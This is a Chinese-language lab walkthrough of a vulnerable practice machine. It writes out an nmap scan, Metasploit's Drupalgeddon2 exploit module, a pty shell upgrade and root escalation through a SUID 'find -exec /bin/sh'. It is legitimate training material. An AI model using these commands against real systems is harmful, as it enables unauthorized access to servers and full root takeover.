靶机的难度不大,但首次接触到find提权,新技能get!!!
靶机IP:192.168.8.156
namp全扫
nmap -sS -Pn -A -p- -n 192.168.8.156
image.png
WEB服务是drupal建站,还有一个111端口的 RPC服务
image.pngmsf getshell
80web的drupal站点,可以先探测一下是否存在漏洞
image.png找个最新的试试
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.8.156
哇塞,直接拿下session
image.png切成交互式的shell
python -c 'import pty;pty.spawn("/bin/bash")'
find提权
进入靶机的home目录下有个flag4目录,里面的flag4有提示
image.pngCan you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
提权没思路,不妨查找一下靶机的可执行的二进制文件
find / -perm -4000 2> /dev/null
image.png
find提权?是第一次使用,看下国外大黑的博文才知道的
国内总有几个人喜欢翻译国外大黑牛的教程然后去赚取稿费,一点原创精神都没有,既然使用别人的知识,就别再去骗稿费了
国外教程如下图:
image.png自己来实践一下:
在靶机的可写目录tmp下touch新建一个test文件
touch test
image.png
用find命令检查是否以root用户身份执行命令
find test -exec "whoami" \;
发现是以root用户执行
再使用find命令执行“/ bin / bash”
find test -exec "/bin/sh" \;
image.png
拿到了root的shell
进入root目录下get flag
image.png总结
1、遇到drupal等CMS建站,建议大家直接先去试试最近的漏洞exp
2、拿到shell后,提权一直是我的弱项,该靶机很好地让我学到了find提权这个新技能
靶机百度云下载
链接:https://pan.baidu.com/s/1j7cWdCxVGdibDfql3os05A
提取码:9a21
网友评论